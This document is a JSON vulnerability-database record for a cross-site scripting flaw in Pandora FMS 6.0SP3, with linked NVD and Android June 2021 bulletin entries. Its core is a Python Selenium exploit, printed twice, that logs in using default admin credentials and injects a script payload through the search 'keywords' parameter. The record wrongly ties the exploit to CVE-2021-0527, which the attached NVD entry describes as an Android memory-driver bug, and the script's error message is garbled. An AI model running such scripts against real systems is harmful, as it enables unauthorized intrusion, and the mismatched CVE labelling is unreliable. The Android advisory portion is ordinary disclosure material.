{"id": "PACKETSTORM:162833", "type": "packetstorm", "bulletinFamily": "exploit", "title": "Pandora FMS 6.0SP3 Cross Site Scripting", "description": "", "published": "2021-05-27T00:00:00", "modified": "2021-05-27T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://packetstormsecurity.com/files/162833/Pandora-FMS-6.0SP3-Cross-Site-Scripting.html", "reporter": "nu11secur1ty", "references": [], "cvelist": ["CVE-2021-0527"], "immutableFields": [], "lastseen": "2021-05-27T13:46:17", "viewCount": 79, "enchantments": {"dependencies": {"references": [{"type": "androidsecurity", "idList": ["ANDROID:2021-06-01"]}, {"type": "cve", "idList": ["CVE-2021-0527"]}, {"type": "zdt", "idList": ["1337DAY-ID-36301"]}], "rev": 4}, "score": {"value": 4.3, "vector": "NONE"}, "backreferences": {"references": [{"type": "androidsecurity", "idList": ["ANDROID:2021-06-01"]}, {"type": "cve", "idList": ["CVE-2021-0527"]}, {"type": "zdt", "idList": ["1337DAY-ID-36301"]}]}, "exploitation": null, "vulnersScore": 4.3}, "sourceHref": "https://packetstormsecurity.com/files/download/162833/pandorafms60sp3-xss.txt", "sourceData": "`# Exploit Title: XSS vulnerability for (keywords) searching parameter in \npandorafms-6.0SP3/pandora_console \n# Author: @nu11secur1ty \n# Testing and Debugging: @nu11secur1ty \n# Date: 05.27.2021 \n# Vendor: https://pandorafms.com/ \n# Link: https://github.com/pandorafms/pandorafms/releases \n# CVE: 2021-0527-nu11secur1ty \n# Proof: \nhttps://github.com/nu11secur1ty/CVE-mitre/blob/main/Pandora%20FMS%206.0%20SP3-XSS-Vulnerability/Pandora%20FMS%206.0%20SP3-XSS-Vulnerability.gif \n \n[+] Exploit Source: \n \n#!/usr/bin/python3 \n# Author: @nu11secur1ty \n# CVE-2021-0527-nu11secur1ty \n \nfrom selenium import webdriver \nimport time \nimport os, sys \n \n \n# Vendor: https://pandorafms.com/ \nwebsite_link=\" \nhttp://192.168.1.160/pandorafms-6.0SP3/pandora_console/index.php\" \n \n# enter your login username \nusername=\"admin\" \n \n# enter your login password \npassword=\"pandora\" \n \n#enter the element for username input field \nelement_for_username=\"nick\" \n \n#enter the element for password input field \nelement_for_password=\"pass\" \n \n#enter the element for submit button \nelement_for_submit=\"login_button\" \n \n \n#browser = webdriver.Safari() #for macOS users[for others use chrome vis \nchromedriver] \nbrowser = webdriver.Chrome() #uncomment this line,for chrome users \n#browser = webdriver.Firefox() #uncomment this line,for chrome users \n \ntime.sleep(3) \nbrowser.get((website_link)) \n \ntry: \nusername_element = browser.find_element_by_name(element_for_username) \nusername_element.send_keys(username) \npassword_element = browser.find_element_by_name(element_for_password) \npassword_element.send_keys(password) \nsignInButton = browser.find_element_by_name(element_for_submit) \nsignInButton.click() \n \n# Exploit Pandora FMS 6.0 SP3-XSS-Vulnerability for (keywords) searching \nparameter \ntime.sleep(3) \n# Payload \nbrowser.get((\" \nhttp://192.168.1.160/pandorafms-6.0SP3/pandora_console/index.php?keywords=%3Cscript%3Ealert%28%22nu11secur1ty_is_here%22%29%3B%3C%2Fscript%3E&head_search_keywords=abc\")) \n \n \nprint(\"The payload is deployed, your GET parameter is vulnerable...\\n\") \n \nexcept Exception: \n#### This exception occurs if the element is not found on the webpage. \nprint(\"Sorry, but this user who you searching for is destroyed by using of \nMySQL vulnerability in backend.php...\") \n \n \n---------------------------------------------------------------------------------------- \n \n# Exploit Title: XSS vulnerability for (keywords) searching parameter in \npandorafms-6.0SP3/pandora_console \n# Date: 05.27.2021 \n# Exploit Authotr idea: @nu11secur1ty \n# Exploit Debugging: @nu11secur1ty \n# Vendor Homepage: https://pandorafms.com/ \n# Software Link: https://github.com/pandorafms/pandorafms/releases \n# Steps to Reproduce: \nhttps://github.com/nu11secur1ty/CVE-mitre/blob/main/Pandora%20FMS%206.0%20SP3-XSS-Vulnerability/Pandora%20FMS%206.0%20SP3-XSS-Vulnerability.gif \n \n`\n", "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1646020944}}
{"zdt": [{"lastseen": "2021-11-08T14:23:28", "description": "", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-05-27T00:00:00", "type": "zdt", "title": "Pandora FMS 6.0SP3 Cross Site Scripting Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-0527"], "modified": "2021-05-27T00:00:00", "id": "1337DAY-ID-36301", "href": "https://0day.today/exploit/description/36301", "sourceData": "# Exploit Title: XSS vulnerability for (keywords) searching parameter in\npandorafms-6.0SP3/pandora_console\n# Author: @nu11secur1ty\n# Testing and Debugging: @nu11secur1ty\n# Vendor: https://pandorafms.com/\n# Link: https://github.com/pandorafms/pandorafms/releases\n# CVE: 2021-0527-nu11secur1ty\n# Proof:\nhttps://github.com/nu11secur1ty/CVE-mitre/blob/main/Pandora%20FMS%206.0%20SP3-XSS-Vulnerability/Pandora%20FMS%206.0%20SP3-XSS-Vulnerability.gif\n\n[+] Exploit Source:\n\n#!/usr/bin/python3\n# Author: @nu11secur1ty\n# CVE-2021-0527-nu11secur1ty\n\nfrom selenium import webdriver\nimport time\nimport os, sys\n\n\n# Vendor: https://pandorafms.com/\nwebsite_link=\"\nhttp://192.168.1.160/pandorafms-6.0SP3/pandora_console/index.php\"\n\n# enter your login username\nusername=\"admin\"\n\n# enter your login password\npassword=\"pandora\"\n\n#enter the element for username input field\nelement_for_username=\"nick\"\n\n#enter the element for password input field\nelement_for_password=\"pass\"\n\n#enter the element for submit button\nelement_for_submit=\"login_button\"\n\n\n#browser = webdriver.Safari() #for macOS users[for others use chrome vis\nchromedriver]\nbrowser = webdriver.Chrome() #uncomment this line,for chrome users\n#browser = webdriver.Firefox() #uncomment this line,for chrome users\n\ntime.sleep(3)\nbrowser.get((website_link))\n\ntry:\nusername_element = browser.find_element_by_name(element_for_username)\nusername_element.send_keys(username)\npassword_element = browser.find_element_by_name(element_for_password)\npassword_element.send_keys(password)\nsignInButton = browser.find_element_by_name(element_for_submit)\nsignInButton.click()\n\n# Exploit Pandora FMS 6.0 SP3-XSS-Vulnerability for (keywords) searching\nparameter\ntime.sleep(3)\n# Payload\nbrowser.get((\"\nhttp://192.168.1.160/pandorafms-6.0SP3/pandora_console/index.php?keywords=%3Cscript%3Ealert%28%22nu11secur1ty_is_here%22%29%3B%3C%2Fscript%3E&head_search_keywords=abc\"))\n\n\nprint(\"The payload is deployed, your GET parameter is vulnerable...\\n\")\n\nexcept Exception:\n#### This exception occurs if the element is not found on the webpage.\nprint(\"Sorry, but this user who you searching for is destroyed by using of\nMySQL vulnerability in backend.php...\")\n\n\n----------------------------------------------------------------------------------------\n\n# Exploit Title: XSS vulnerability for (keywords) searching parameter in\npandorafms-6.0SP3/pandora_console\n# Date: 05.27.2021\n# Exploit Authotr idea: @nu11secur1ty\n# Exploit Debugging: @nu11secur1ty\n# Vendor Homepage: https://pandorafms.com/\n# Software Link: https://github.com/pandorafms/pandorafms/releases\n# Steps to Reproduce:\nhttps://github.com/nu11secur1ty/CVE-mitre/blob/main/Pandora%20FMS%206.0%20SP3-XSS-Vulnerability/Pandora%20FMS%206.0%20SP3-XSS-Vulnerability.gif\n", "sourceHref": "https://0day.today/exploit/36301", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2022-03-23T12:32:56", "description": "In memory management driver, there is a possible memory corruption due to a use after free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android SoCAndroid ID: A-185193931", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-21T17:15:00", "type": "cve", "title": "CVE-2021-0527", "cwe": ["CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-0527"], "modified": "2021-06-23T15:54:00", "cpe": ["cpe:/o:google:android:-"], "id": "CVE-2021-0527", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-0527", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:google:android:-:*:*:*:*:*:*:*"]}], "androidsecurity": [{"lastseen": "2021-11-26T23:22:27", "description": "The Android Security Bulletin contains details of security vulnerabilities affecting Android devices. Security patch levels of 2021-06-05 or later address all of these issues. To learn how to check a device's security patch level, see [Check and update your Android version](<https://support.google.com/pixelphone/answer/4457705>).\n\nAndroid partners are notified of all issues at least a month before publication. Source code patches for these issues have been released to the Android Open Source Project (AOSP) repository and linked from this bulletin. This bulletin also includes links to patches outside of AOSP. \n\nThe most severe of these issues is a critical security vulnerability in the System component that could enable a remote attacker using a specially crafted transmission to execute arbitrary code within the context of a privileged process. The severity assessment is based on the effect that exploiting the vulnerability would possibly have on an affected device, assuming the platform and service mitigations are turned off for development purposes or if successfully bypassed. \n\n## Announcements\n\n * For July, the Android public security bulletin will be released on July 7, 2021\n\nRefer to the Android and Google Play Protect mitigations section for details on the Android security platform protections and Google Play Protect, which improve the security of the Android platform.\n\n**Note**: Information on the latest over-the-air update (OTA) and firmware images for Google devices is available in the June 2021 Pixel Update Bulletin. \n\n## Android and Google service mitigations\n\nThis is a summary of the mitigations provided by the Android security platform and service protections such as [Google Play Protect](<https://developers.google.com/android/play-protect>). These capabilities reduce the likelihood that security vulnerabilities could be successfully exploited on Android.\n\n * Exploitation for many issues on Android is made more difficult by enhancements in newer versions of the Android platform. We encourage all users to update to the latest version of Android where possible.\n * The Android security team actively monitors for abuse through [Google Play Protect](<https://developers.google.com/android/play-protect>) and warns users about Potentially Harmful Applications. Google Play Protect is enabled by default on devices with [Google Mobile Services](<http://www.android.com/gms>), and is especially important for users who install apps from outside of Google Play. \n\n## 2021-06-01 security patch level vulnerability details\n\nIn the sections below, we provide details for each of the security vulnerabilities that apply to the 2021-06-01 patch level. Vulnerabilities are grouped under the component they affect. Issues are described in the tables below and include CVE ID, associated references, type of vulnerability, severity, and updated AOSP versions (where applicable). When available, we link the public change that addressed the issue to the bug ID, like the AOSP change list. When multiple changes relate to a single bug, additional references are linked to numbers following the bug ID. Devices with Android 10 and later may receive security updates as well as [Google Play system updates](<https://support.google.com/android/answer/7680439>). \n\n### Android runtime\n\nThe vulnerability in this section could enable a local attacker to execute arbitrary code and bypass user interaction requirements in order to gain access to additional permissions. \n\nCVE | References | Type | Severity | Updated AOSP versions \n---|---|---|---|--- \nCVE-2021-0511 | [A-178055795](<https://android.googlesource.com/platform/art/+/7c7cae75a80eece7cf009ea12da644ea7c893c1d>) [[2](<https://android.googlesource.com/platform/art/+/2c4ee9b7ff3a8ce17ba4e0cfd841eb2027d51619>)] [[3](<https://android.googlesource.com/platform/art/+/c802c3713270b363240dc48409a66c5c35601281>)] | EoP | High | 9, 10, 11 \n \n### Framework\n\nThe vulnerability in this section could lead to local information disclosure of cross-user permissions with no additional execution privileges needed. \n\nCVE | References | Type | Severity | Updated AOSP versions \n---|---|---|---|--- \nCVE-2021-0521 | [A-174661955](<https://android.googlesource.com/platform/frameworks/base/+/9b694ef4d45ca54bcc4b7de6940f5608047a1a16>) | ID | High | 8.1, 9, 10, 11 \n \n### Media Framework\n\nThe most severe vulnerability in this section could enable a local malicious application to bypass user interaction requirements in order to gain access to additional permissions. \n\nCVE | References | Type | Severity | Updated AOSP versions \n---|---|---|---|--- \nCVE-2021-0508 | [A-176444154](<https://android.googlesource.com/platform/frameworks/av/+/e07417a9b7829cfb32505947f700fd8dad9e12e6>) | EoP | High | 8.1, 9, 10, 11 \nCVE-2021-0509 | [A-176444161](<https://android.googlesource.com/platform/frameworks/av/+/79a6ffbdaf14cfbb597efd8545ba401f1da28a4f>) [[2](<https://android.googlesource.com/platform/hardware/interfaces/+/a4e76aab230a565dd0cef11e2e6e2d782b685327>)] | EoP | High | 8.1, 9, 10, 11 \nCVE-2021-0510 | [A-176444622](<https://android.googlesource.com/platform/hardware/interfaces/+/9191787d0e73712608eff22fca9aea9480d4691e>) | EoP | High | 8.1, 9, 10, 11 \nCVE-2021-0520 | [A-176237595](<https://android.googlesource.com/platform/frameworks/av/+/3b1141d44f448ea9a528ff8af8f128686c35039d>) | EoP | High | 10, 11 \n \n### System\n\nThe most severe vulnerability in this section could enable a remote attacker using a specially crafted transmission to execute arbitrary code within the context of a privileged process. \n\nCVE | References | Type | Severity | Updated AOSP versions \n---|---|---|---|--- \nCVE-2021-0507 | [A-181860042](<https://android.googlesource.com/platform/system/bt/+/4deeb022c7efe39e9ce34d9373ba900d9ed2741f>) | RCE | Critical | 8.1, 9, 10, 11 \nCVE-2021-0516 | [A-181660448](<https://android.googlesource.com/platform/external/wpa_supplicant_8/+/13c4cdae55e840a1a47e57e19bfa59135358b8ca>) | EoP | Critical | 8.1, 9, 10, 11 \nCVE-2021-0505 | [A-179975048](<https://android.googlesource.com/platform/packages/apps/Settings/+/735a216da31d8440d23fed4355521013ead630f3>) | EoP | High | 11 \nCVE-2021-0506 | [A-181962311](<https://android.googlesource.com/platform/packages/apps/Settings/+/ceb2e28da4f29954fbf6b6c2f10678458ef4a288>) | EoP | High | 8.1, 9, 10, 11 \nCVE-2021-0523 | [A-174047492](<https://android.googlesource.com/platform/packages/apps/Settings/+/05d6fa9bcb90886ac2611f86bb7d2af7078eb3ad>) | EoP | High | 10, 11 \nCVE-2021-0504 | [A-179162665](<https://android.googlesource.com/platform/system/bt/+/6e3c984806aa0ba9e8a836ef9fed12c1207a161e>) | ID | High | 11 \nCVE-2021-0517 | [A-179053823](<https://android.googlesource.com/platform/frameworks/base/+/5b90ebaf4d9edefcd9648b46cd0226f882169476>) | ID | High | 11 \nCVE-2021-0522 | [A-174182139](<https://android.googlesource.com/platform/system/bt/+/71c573ae67b6a15c33ad1036b37b999c54d7236b>) | ID | High | 9, 10, 11 \n \n### Google Play system updates\n\nThere are no security issues addressed in Google Play system updates (Project Mainline) this month.\n\n## 2021-06-05 security patch level vulnerability details\n\nIn the sections below, we provide details for each of the security vulnerabilities that apply to the 2021-06-05 patch level. Vulnerabilities are grouped under the component they affect. Issues are described in the tables below and include CVE ID, associated references, type of vulnerability, severity, and updated AOSP versions (where applicable). When available, we link the public change that addressed the issue to the bug ID, like the AOSP change list. When multiple changes relate to a single bug, additional references are linked to numbers following the bug ID. \n\n### Framework\n\nThe vulnerability in this section could enable a local malicious application to bypass user interaction requirements in order to gain access to additional permissions. \n\nCVE | References | Type | Severity | Updated AOSP versions \n---|---|---|---|--- \nCVE-2021-0513 | [A-156090809](<https://android.googlesource.com/platform/frameworks/base/+/8cb7e0a881fed2a7d80b69aed77275bd483043ad>) | EoP | High | 8.1, 9, 10, 11 \n \n### System\n\nThe most severe vulnerability in this section could enable a remote attacker using a specially crafted transmission to gain access to additional permissions. \n\nCVE | References | Type | Severity | Updated AOSP versions \n---|---|---|---|--- \nCVE-2020-26555 | [A-174626251](<https://android.googlesource.com/platform/system/bt/+/374bb0401a5649af4a97e8d8c7373c7daf37f6ac>) | EoP | High | 8.1, 9, 10, 11 \nCVE-2020-26558 | [A-174886838](<https://android.googlesource.com/platform/system/bt/+/45678238713ba15cca8dd453b992caedf1d43ec5>) | EoP | High | 8.1, 9, 10, 11 \nCVE-2021-0478 | [A-169255797](<https://android.googlesource.com/platform/frameworks/base/+/bca2b3aeabd164c1cf4bdc113366665976b0c831>) | EoP | High | 8.1, 9, 10, 11 \n \n### Kernel components\n\nThe most severe vulnerability in this section could lead to local escalation of privilege with no additional execution privileges needed. \n\nCVE | References | Type | Severity | Component \n---|---|---|---|--- \nCVE-2020-14305 | A-174904512 [Upstream kernel](<https://android.googlesource.com/kernel/common/+/396ba2fc4f27ef6c44bbc0098bfddf4da76dc4c9>) | EoP | High | Voice Over IP H.323 \nCVE-2021-0512 | A-173843328 [Upstream kernel](<https://android.googlesource.com/kernel/common/+/ed9be64eefe2>) | EoP | High | HID \n \n### MediaTek components\n\nThese vulnerabilities affect MediaTek components and further details are available directly from MediaTek. The severity assessment of these issues is provided directly by MediaTek. \n\nCVE | References | Severity | Component \n---|---|---|--- \nCVE-2021-0525 | A-185193929 M-ALPS05403499* | High | memory management driver \nCVE-2021-0526 | A-185195264 M-ALPS05403499* | High | memory management driver \nCVE-2021-0527 | A-185193931 M-ALPS05403499* | High | memory management driver \nCVE-2021-0528 | A-185195266 M-ALPS05403499 * | High | memory management driver \nCVE-2021-0529 | A-185195268 M-ALPS05403499* | High | memory management driver \nCVE-2021-0530 | A-185196175 M-ALPS05403499 * | High | memory management driver \nCVE-2021-0531 | A-185195272 M-ALPS05403499* | High | memory management driver \nCVE-2021-0532 | A-185196177 M-ALPS05403499* | High | memory management driver \nCVE-2021-0533 | A-185193932 M-ALPS05403499* | High | memory management driver \n \n### Qualcomm components\n\nThis vulnerability affects Qualcomm components and are described in further detail in the appropriate Qualcomm security bulletin or security alert. The severity assessment of this issue is provided directly by Qualcomm. \n\nCVE | References | Severity | Component \n---|---|---|--- \nCVE-2020-11267 | A-168918351 [QC-CR#2723768](<https://source.codeaurora.org/quic/la/kernel/msm-4.9/commit/?id=6b3e480f729f291ec9e89e9864582795f02ac1d9>) [[2](<https://source.codeaurora.org/quic/qsdk/oss/kernel/linux-msm/commit/?id=b2d624743de45b07bffc53224fa8987dd7199fae>)] [[3](<https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=4e921964bd0686950>)] | High | Security \n \n### Qualcomm closed-source components\n\nThese vulnerabilities affect Qualcomm closed-source components and are described in further detail in the appropriate Qualcomm security bulletin or security alert. The severity assessment of these issues is provided directly by Qualcomm. \n\nCVE | References | Severity | Component \n---|---|---|--- \nCVE-2020-11176 | A-175038159* | Critical | Closed-source component \nCVE-2020-11291 | A-175038624* | Critical | Closed-source component \nCVE-2020-26558 | A-179039983* | Critical | Closed-source component \nCVE-2020-11292 | A-171309888* | High | Closed-source component \nCVE-2020-11298 | A-175038385* | High | Closed-source component \nCVE-2020-11304 | A-167567084* | High | Closed-source component \nCVE-2020-11306 | A-175038981* | High | Closed-source component \nCVE-2020-26555 | A-181682537* | High | Closed-source component \nCVE-2021-1900 | A-181682536* | High | Closed-source component \nCVE-2021-1925 | A-179040020* | High | Closed-source component \nCVE-2021-1937 | A-181682513* | High | Closed-source component \n \n## Common questions and answers\n\nThis section answers common questions that may occur after reading this bulletin.\n\n**1\\. How do I determine if my device is updated to address these issues?**\n\nTo learn how to check a device's security patch level, see [Check and update your Android version](<https://support.google.com/pixelphone/answer/4457705#pixel_phones&nexus_devices>).\n\n * Security patch levels of 2021-06-01 or later address all issues associated with the 2021-06-01 security patch level.\n * Security patch levels of 2021-06-05 or later address all issues associated with the 2021-06-05 security patch level and all previous patch levels.\n\nDevice manufacturers that include these updates should set the patch string level to:\n\n * [ro.build.version.security_patch]:[2021-06-01]\n * [ro.build.version.security_patch]:[2021-06-05]\n\nFor some devices on Android 10 or later, the Google Play system update will have a date string that matches the 2021-06-01 security patch level. Please see [this article](<https://support.google.com/android/answer/7680439>) for more details on how to install security updates.\n\n**2\\. Why does this bulletin have two security patch levels?**\n\nThis bulletin has two security patch levels so that Android partners have the flexibility to fix a subset of vulnerabilities that are similar across all Android devices more quickly. Android partners are encouraged to fix all issues in this bulletin and use the latest security patch level.\n\n * Devices that use the 2021-06-01 security patch level must include all issues associated with that security patch level, as well as fixes for all issues reported in previous security bulletins.\n * Devices that use the security patch level of 2021-06-05 or newer must include all applicable patches in this (and previous) security bulletins.\n\nPartners are encouraged to bundle the fixes for all issues they are addressing in a single update.\n\n**3\\. What do the entries in the _Type_ column mean?**\n\nEntries in the _Type_ column of the vulnerability details table reference the classification of the security vulnerability.\n\nAbbreviation | Definition \n---|--- \nRCE | Remote code execution \nEoP | Elevation of privilege \nID | Information disclosure \nDoS | Denial of service \nN/A | Classification not available \n \n**4\\. What do the entries in the _References_ column mean?**\n\nEntries under the _References_ column of the vulnerability details table may contain a prefix identifying the organization to which the reference value belongs.\n\nPrefix | Reference \n---|--- \nA- | Android bug ID \nQC- | Qualcomm reference number \nM- | MediaTek reference number \nN- | NVIDIA reference number \nB- | Broadcom reference number \n \n**5\\. What does an * next to the Android bug ID in the _References_ column mean?**\n\nIssues that are not publicly available have an * next to the corresponding reference ID. The update for that issue is generally contained in the latest binary drivers for Pixel devices available from the [Google Developer site](<https://developers.google.com/android/drivers>). \n\n**6\\. Why are security vulnerabilities split between this bulletin and device / partner security bulletins, such as the Pixel bulletin?**\n\nSecurity vulnerabilities that are documented in this security bulletin are required to declare the latest security patch level on Android devices. Additional security vulnerabilities that are documented in the device / partner security bulletins are not required for declaring a security patch level. Android device and chipset manufacturers may also publish security vulnerability details specific to their products, such as [Google](<https://source.android.com/security/bulletin/pixel>), [Huawei](<https://consumer.huawei.com/en/support/bulletin/>), [LGE](<https://lgsecurity.lge.com/security_updates_mobile.html>), [Motorola](<https://motorola-global-portal.custhelp.com/app/software-security-page/g_id/6806>), [Nokia](<https://www.nokia.com/phones/en_int/security-updates>), or [Samsung](<https://security.samsungmobile.com/securityUpdate.smsb>).\n\n## Versions\n\nVersion | Date | Notes \n---|---|--- \n1.0 | June 7, 2021 | Bulletin published \n1.1 | June 8, 2021 | Bulletin revised to include AOSP links\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-06-07T00:00:00", "type": "androidsecurity", "title": "Android Security Bulletin\u2014June 2021", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11176", "CVE-2020-11267", "CVE-2020-11291", "CVE-2020-11292", "CVE-2020-11298", "CVE-2020-11304", "CVE-2020-11306", "CVE-2020-14305", "CVE-2020-26555", "CVE-2020-26558", "CVE-2021-0478", "CVE-2021-0504", "CVE-2021-0505", "CVE-2021-0506", "CVE-2021-0507", "CVE-2021-0508", "CVE-2021-0509", "CVE-2021-0510", "CVE-2021-0511", "CVE-2021-0512", "CVE-2021-0513", "CVE-2021-0516", "CVE-2021-0517", "CVE-2021-0520", "CVE-2021-0521", "CVE-2021-0522", "CVE-2021-0523", "CVE-2021-0525", "CVE-2021-0526", "CVE-2021-0527", "CVE-2021-0528", "CVE-2021-0529", "CVE-2021-0530", "CVE-2021-0531", "CVE-2021-0532", "CVE-2021-0533", "CVE-2021-1900", "CVE-2021-1925", "CVE-2021-1937"], "modified": "2021-06-08T00:00:00", "id": "ANDROID:2021-06-01", "href": "https://source.android.com/security/bulletin/2021-06-01", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}